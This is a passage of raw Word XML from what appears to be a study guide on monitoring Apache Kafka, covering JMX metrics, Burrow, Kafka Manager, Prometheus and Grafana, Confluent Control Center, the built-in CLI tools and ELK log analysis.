          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EC739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Using Prometheus and Grafana</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611A6A4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metheus and Grafana are popular open-source tools for monitoring and alerting. You can integrate them with Kafka to collect and visualize metrics in a more advanced manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6BEF2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Prometheus Kafka Exporter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C257FA"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pulls metrics from Kafka brokers and exposes them in a Prometheus-compatible format. It gathers Kafka metrics through JMX and exports them to Prometheus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB5DD1F"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deploy </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus Kafka Exporter</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in your Kafka cluster to collect data, and then use Prometheus to scrape those metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF0DD2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Grafana Dashboards:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C611AC8" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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e metrics are collected by Prometheu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visualize and monitor Kafka’s health in real-time. Grafana offers predefined dashboards for Kafka, which display various metrics like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044D1691"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roker status and partition replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C677D16"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4936889D"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roughput (bytes/requests per second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C23BDC9"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 and error rates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12349E31"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be used to set up alerts based on defined thresholds, enabling proactive monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A56CE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Using Burrow for Consumer Lag Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7050C9F7"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tool designed specifically for monitoring Kafka consumer lag. It tracks the lag between Kafka consumers and partitions in real-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6660EAF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 Features</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F22BE4D"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consumer lag tracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EB6F21"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erting for consumer lag exceeding a certain threshold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D13390C"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API access for integration into other systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65808F6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can be configured to monitor Kafka consumer lag, helping ensure that consumers are processing messages efficiently without falling behind.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100B0B1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ing Kafka’s Built-in Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B41C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built-in tools to monitor cluster performance and health:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BE38ED" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Tool (kafka-topics.sh, kafka-consumer-groups.sh, kafka-broker-api-versions.sh)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769AA88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Get the list of topics, partitions, and replication status.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26400103"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Check consumer group status and lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00738BF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Check the API versions supported by each broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCD14D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can be used for on-demand checks and troubleshooting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A63A7A"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Using Confluent Control Center</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451E37C2"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you are using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a commercial distribution of Kafka),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provides a rich, web-based interface to monitor Kafka clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334DD45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luent Control Center Features</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD8A0D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 topics, brokers, and consumers in real-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509E5222"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ck consumer lag and message throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C1C4E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sualize partition distribution and replication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AAE67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4F5877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un as regular processes on servers, so you can also use system-level monitoring tools to track the health of the underlying hardware:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF38828" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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to Monitor</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBB2061"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CPU and memory usage on each broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D5E569"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monitor disk usage, throughput, and latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CE9B28"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Monitor the network traffic between Kafka brokers, producers, and consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6222EEE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can be integrated to monitor these system-level metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7132F1B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ging and Alerting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6ED43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detailed logging for each broker, which can be analyzed using </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ELK Stack (Elasticsearch, Logstash, and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xml:space="preserve"> for further analysis and visualization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CF1AF8"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be used to aggregate logs from Kafka brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4A544A"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the logs and allows you to query and analyze them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A907D91"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provides a web interface to visualize and explore log data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042DDF9F"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et up alerts based on Kafka log patterns to quickly respond to errors or anomalies in the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE89639"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD80323"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58FD4E6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B6770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BytesInPerSec, BytesOutPerSec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B02043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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776796C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C112FDB"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1A65C84A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC18FA8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B0F288"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4054FE5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AED6A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296EA116"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14269499"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artition Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271F6FA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Size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0A0FE2"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umber of Partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29104B3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Replication Status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712319A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A9B37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CE4B95" w:rsidRDefault="00000000" w:rsidP="000B3FC1">
      <w:pPr>
        <w:ind w:firstLine="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3FFA402">
          <v:rect id="_x0000_i3398" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="079E75D0" w14:textId="0D08516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843" w:name="_Toc197868057"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Discuss tools and techniques for monitoring Kafka performance and health (e.g., JMX metrics, Kafka Manager, Burrow, Prometheus)</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="843"/>
    </w:p>
    <w:p w14:paraId="57C8FB6E" w14:textId="7B94885E" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FA670D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JMX Metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3EC1E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xml:space="preserve"> is a powerful mechanism for monitoring and managing Java applications, including Kafka. Kafka exposes a variety of metrics through JMX, which can be accessed via tools such as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These metrics provide real-time insights into Kafka's operations, such as message throughput, consumer lag, and partition replication status.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A10E6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Kafka Metrics Available via JMX:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB2B007"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2817ED3D"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 The rate at which messages are received by a broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F4F7D4"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tesInPerSec, BytesOutPerSec: The rate at which bytes are received and sent by a broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D46279"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 The number of partitions that are under-replicated (i.e., the number of partitions that do not have the required number of replicas).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D2895B"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 The percentage of time the request handler is idle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EC5A41"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574F1C32"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 The rate at which produce requests are sent to Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F986EE"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 The size of the produce requests in bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBA06FE"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2EAB1065"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 The rate of fetch requests sent by consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A0CF86"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 The time it takes for the consumer to fetch data from a broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4649E7"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 The lag between the consumer and the latest offset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528E176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to Enable JMX in Kafka:</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> To expose JMX metrics, you need to configure Kafka brokers to use JMX by adding these options to your broker’s startup command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3025C22F"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3975C24"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then use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the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50B6AD77"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Manager (CMAK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2986A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previously known as CMAK)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a tool for managing and monitoring Kafka clusters. It provides an easy-to-use web interface to manage brokers, topics, and consumer groups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531F4EA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Key Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7319D11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Overview</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides a view of all Kafka brokers, topics, and partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40770019"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nitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Tracks consumer groups, their offsets, and lag, helping to identify any consumer lag issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304BA77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Health</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays metrics like broker uptime, partition replication status, and under-replicated partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61640E51"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Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows users to create, delete, and manage Kafka topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568618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ation &amp; Setup</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Manager is typically deployed as a web application. Once set up, you can monitor multiple Kafka clusters and perform management tasks directly through the interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71785F8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urrow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F650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Burrow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CD3521"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Consumer Lag Monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Tracks how far behind consumers are from the latest message in the partition they are consuming from.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367C01BD"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lerting</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Sends alerts when consumer lag exceeds predefined thresholds, enabling proactive handling of slow consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5B85D4"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PI</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides a REST API to access consumer lag information, which can be integrated with other systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2829EB8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is particularly useful for monitoring consumer health, ensuring that consumers are processing messages efficiently and not falling too far behind.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3CBDB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ometheus &amp; Grafana</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1447912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xml:space="preserve"> is an open-source monitoring and alerting toolkit, and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is a popular dashboard tool for visualizing metrics. Together, they are commonly used to monitor Kafka’s performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1898D732"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metheus Kafka Exporter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8451F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 Number of produce requests, request size, response times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2D2BE0"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 Consumer fetch requests, fetch response times, consumer lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF91934"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 Broker resource utilization, disk I/O, number of partitions, under-replicated partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E48A36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rafana Dashboards</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Once Prometheus collects Kafka metric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create dashboards that provide a visual overview of Kafka’s health. Grafana offers pre-configured dashboards specifically for Kafka, which include metrics such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B17326"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tatus</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays the health of each broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499B2C48"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Shows the lag of consumer groups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FE97D4"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Tracks messages produced and consumed per second.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2213796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also be used to set up alerts based on predefined thresholds, notifying you of potential issues in your Kafka cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60255901"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fluent Control Center</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D46D7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users of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is a commercial tool designed to monitor and manage Kafka clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5778D3A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Confluent Control Center:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515CDB47"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Monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Tracks Kafka cluster health, producer/consumer performance, and topic status in real-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7255074F"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Replication</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Monitors replication across partitions and ensures that there are no under-replicated partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43065DB5"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Tracks consumer lag for each consumer group and alerts when the lag exceeds a threshold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6645B3E8"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and Dashboards</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Offers pre-built dashboards for Kafka monitoring, including metrics like throughput, replication status, and consumer lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B13AC3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fluent Control Center also provides advanced features such as data quality monitoring, schema validation, and audit logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC37BA5"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Kafka’s Built-In Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526B60D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ncludes several built-in command-line tools that can be used for basic monitoring and troubleshooting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6E707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topics.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Lists topics, shows partition information, and helps in managing topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DD8210"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zookeeper &lt;zk-server&gt; --describe --topic &lt;topic-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D36AF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kafka-consumer-groups.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays consumer group information, including offsets and lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BB66AF"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bootstrap-server &lt;kafka-broker&gt; --describe --group &lt;group-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605F496C"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broker-api-versions.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays the Kafka API versions supported by brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4290AC32"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bootstrap-server &lt;kafka-broker&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432ACC9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provide useful information for on-the-spot checks, but they are more suited for troubleshooting rather than continuous monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF768D6"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3D7DCB7C"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addition to the Kafka-specific tools, system-level monitoring tools can be used to monitor the underlying hardware and resources used by Kafka brokers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF4238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how much CPU and memory Kafka brokers are consuming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0480F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it’s important to monitor disk usage and throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D51631"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Track network traffic between brokers, producers, and consumers, especially when dealing with large amounts of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC13D0D"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Zabbix</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to gather system-level metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3650011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 Aggregation and Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36471312"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logs contain important information about the status and health of the cluster. By aggregating Kafka logs with tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ELK Stack (Elasticsearch, Logstash,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you can analyze logs in real-time to detect errors or warnings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB35E19"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collect and aggregate logs from Kafka brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2DC6A3"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logs and allows querying.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2A4817"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visualizes log data, providing insights into issues like broker failures, replication problems, and other anomalies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631C4AF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Alerting Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F757AF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ing tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus Alertmanag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lack</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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7C4410F" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="00CE4B95" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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CE4B95" w:rsidRDefault="00000000" w:rsidP="00C5416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CCB8C0F">
          <v:rect id="_x0000_i3399" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
